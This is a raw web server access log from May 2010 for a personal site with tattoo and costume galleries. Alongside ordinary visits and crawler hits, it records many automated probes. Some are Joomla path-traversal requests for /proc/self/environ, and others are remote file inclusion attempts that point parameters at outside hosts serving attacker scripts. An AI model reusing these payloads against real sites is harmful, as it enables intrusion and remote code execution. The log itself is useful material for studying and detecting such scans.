211.169.249.251 - - [15/May/2010:14:51:42 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
211.169.249.251 - - [15/May/2010:14:51:42 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
211.169.249.251 - - [15/May/2010:14:51:45 -0500] "GET /logs/access_log.1273363200//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
211.169.249.251 - - [15/May/2010:14:51:45 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
77.72.6.2 - - [15/May/2010:14:51:46 -0500] "GET /index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 404 293 "-""libwww-perl/5.810"
211.169.249.251 - - [15/May/2010:14:51:46 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
114.108.177.125 - - [15/May/2010:14:54:37 -0500] "GET /logs/access_log.1273190400//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
211.169.249.251 - - [15/May/2010:14:57:13 -0500] "GET /logs/access_log.1273190400//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
211.169.249.251 - - [15/May/2010:14:57:18 -0500] "GET /logs/access_log.1273190400//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
211.169.249.251 - - [15/May/2010:14:57:24 -0500] "GET /logs/access_log.1273190400//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
87.250.255.243 - - [15/May/2010:14:59:47 -0500] "GET /logs/access_log.1248393600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
66.98.216.61 - - [15/May/2010:14:59:51 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:14:59:52 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:14:59:52 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:14:59:52 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:14:59:52 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
207.46.199.54 - - [15/May/2010:15:02:39 -0500] "GET /logs/access_log.1262131200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [15/May/2010:15:05:14 -0500] "GET /logs/access_log.1221523200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.101 - - [15/May/2010:15:06:39 -0500] "GET /logs/access_log.1186704000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
220.80.108.70 - - [15/May/2010:15:09:53 -0500] "GET /logs/access_log.1212451200//index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
87.250.255.243 - - [15/May/2010:15:11:47 -0500] "GET /logs/access_log.1195084800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.88.4.141 - - [15/May/2010:15:12:38 -0500] "GET /logs/index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
121.88.4.141 - - [15/May/2010:15:12:39 -0500] "GET /index.php?option=com_htmlarea3_xtd-c&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
87.250.255.243 - - [15/May/2010:15:18:20 -0500] "GET /logs/access_log.1163030400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [15/May/2010:15:27:04 -0500] "GET /logs/access_log.1261699200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
66.98.216.61 - - [15/May/2010:15:28:44 -0500] "GET /logs/access_log.1273017600/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:15:28:44 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:15:28:44 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
120.29.168.99 - - [15/May/2010:15:28:55 -0500] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://samsa.com.au/cache/id1?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
120.29.168.99 - - [15/May/2010:15:28:55 -0500] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://samsa.com.au/cache/id1?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
120.29.168.99 - - [15/May/2010:15:28:55 -0500] "GET /logs/access_log.1262649600/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://samsa.com.au/cache/id1?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
98.154.116.158 - - [15/May/2010:15:29:15 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://www.google.com/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat-cd1.jpg&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo-order.htm&usg=__ZQW5tDuHd7NH9hPEBuRT8827w9Y=&h=364&w=405&sz=67&hl=en&start=34&sig2=BxGcyT96yp3LroHCl8DyrA&itbs=1&tbnid=l48fMOZCNyJY3M:&tbnh=111&tbnw=124&prev=/images%3Fq%3Dvintage%2Btat%26start%3D20%26hl%3Den%26safe%3Doff%26client%3Dfirefox-a%26sa%3DN%26rls%3Dorg.mozilla:en-US:official%26gbv%3D2%26ndsp%3D20%26tbs%3Disch:1&ei=8QPvS43oBqW2tAOuw9WzDw""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)"
98.154.116.158 - - [15/May/2010:15:29:16 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)"
89.252.47.180 - - [15/May/2010:15:29:16 -0500] "GET /costume/025_JPG%20copy.jpg HTTP/1.1" 200 48186 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; ru-ru) AppleWebKit/531.22.7 (KHTML, like Gecko) WebClip/5527.2 Safari/5531.22.7"
98.154.116.158 - - [15/May/2010:15:29:20 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)"
98.154.116.158 - - [15/May/2010:15:29:20 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)"
66.98.216.61 - - [15/May/2010:15:29:20 -0500] "GET /logs/access_log.1273017600/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:15:29:20 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:15:29:21 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:15:29:21 -0500] "GET /logs/access_log.1273017600/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:15:29:21 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:15:29:21 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
98.154.116.158 - - [15/May/2010:15:29:21 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)"
98.154.116.158 - - [15/May/2010:15:29:23 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)"
66.98.216.61 - - [15/May/2010:15:29:28 -0500] "GET /logs/access_log.1273190400/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
93.186.180.65 - - [15/May/2010:15:29:48 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
120.29.168.99 - - [15/May/2010:15:30:05 -0500] "GET /logs/access_log.1273363200/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://samsa.com.au/cache/id1?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
66.98.216.61 - - [15/May/2010:15:30:21 -0500] "GET /logs/access_log.1273017600/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:15:30:22 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:15:30:22 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:15:30:39 -0500] "GET /logs/access_log.1273190400/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:15:30:40 -0500] "GET /logs/access_log.1273190400/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:15:31:02 -0500] "GET /logs/access_log.1273190400/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:15:33:22 -0500] "GET /logs/access_log.1273017600/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:15:33:22 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
66.98.216.61 - - [15/May/2010:15:33:22 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
178.162.135.170 - - [15/May/2010:15:33:24 -0500] "GET /logs/access_log.1215648000 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1215648000""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461)"
178.162.135.170 - - [15/May/2010:15:33:25 -0500] "GET / HTTP/1.0" 200 991 "http://tomdolan.pconline.com/""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461)"
66.98.216.61 - - [15/May/2010:15:34:04 -0500] "GET /logs/access_log.1273190400/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
89.185.231.103 - - [15/May/2010:15:34:32 -0500] "GET //administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
89.185.231.103 - - [15/May/2010:15:34:32 -0500] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
89.185.231.103 - - [15/May/2010:15:34:32 -0500] "GET /logs/access_log.1273017600//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 382 "-""Mozilla/5.0"
87.250.255.243 - - [15/May/2010:15:34:43 -0500] "GET /logs/access_log.1188172800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.46 - - [15/May/2010:15:39:09 -0500] "GET /logs/access_log.1218672000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
93.186.180.65 - - [15/May/2010:15:39:15 -0500] "GET /logs/access_log.1273363200//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
93.186.180.65 - - [15/May/2010:15:39:15 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
93.186.180.65 - - [15/May/2010:15:39:15 -0500] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
81.80.122.44 - - [15/May/2010:15:39:28 -0500] "GET /logs/access_log.1222646400//vwar/convert/mvcw.php?step=1&vwar_root=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
81.80.122.44 - - [15/May/2010:15:39:28 -0500] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
81.80.122.44 - - [15/May/2010:15:39:29 -0500] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
87.250.255.243 - - [15/May/2010:15:40:23 -0500] "GET /logs/access_log.1163721600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
93.186.180.65 - - [15/May/2010:15:40:37 -0500] "GET /logs/access_log.1273017600//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
114.108.151.149 - - [15/May/2010:15:41:31 -0500] "GET /bbs//delete_comment.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 307 "-""Mozilla/5.0"
114.108.151.149 - - [15/May/2010:15:41:31 -0500] "GET /logs/access_log.1265068800/bbs//delete_comment.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
114.108.151.149 - - [15/May/2010:15:41:31 -0500] "GET /logs/bbs//delete_comment.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
114.108.151.149 - - [15/May/2010:15:41:32 -0500] "GET /bbs//delete_comment.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 307 "-""Mozilla/5.0"
114.108.151.149 - - [15/May/2010:15:41:32 -0500] "GET /logs/access_log.1265068800/bbs//delete_comment.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
114.108.151.149 - - [15/May/2010:15:41:32 -0500] "GET /logs/bbs//delete_comment.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
114.108.151.149 - - [15/May/2010:15:41:37 -0500] "GET /logs/access_log.1266278400/bbs//delete_comment.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
114.108.151.149 - - [15/May/2010:15:41:56 -0500] "GET /logs/access_log.1266278400/bbs//delete_comment.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
69.86.244.109 - - [15/May/2010:15:42:51 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/search?client=safari&rls=en&q=bert+grimm+flash&ie=UTF-8&oe=UTF-8""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:42:51 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:42:53 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:42:56 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:42:56 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:42:56 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:42:57 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:42:57 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:42:57 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:42:57 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:42:57 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:42:57 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:42:57 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:42:57 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:06 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:06 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:06 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:06 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:06 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:06 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:06 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:06 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:06 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:06 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:06 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:14 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:14 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:14 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:14 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:14 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:14 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:14 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
69.86.244.109 - - [15/May/2010:15:43:14 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
